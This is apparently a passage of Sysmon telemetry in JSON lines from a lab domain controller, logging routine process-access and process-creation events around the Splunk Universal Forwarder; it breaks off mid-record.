{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8098,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8099,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8100,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8101,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8102,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8103,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.215\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0512-5F25-0000-0010EC181300}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.215","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0512-5F25-0000-0010EC181300}","TargetProcessId":"1320","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8104,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.951\r\nProcessGuid: {A837DB8D-0512-5F25-0000-0010EF1A1300}\r\nProcessId: 3488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.951","ProcessGuid":"{A837DB8D-0512-5F25-0000-0010EF1A1300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8105,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0512-5F25-0000-0010EF1A1300}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0512-5F25-0000-0010EF1A1300}","TargetProcessId":"3488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8106,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0512-5F25-0000-0010EF1A1300}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 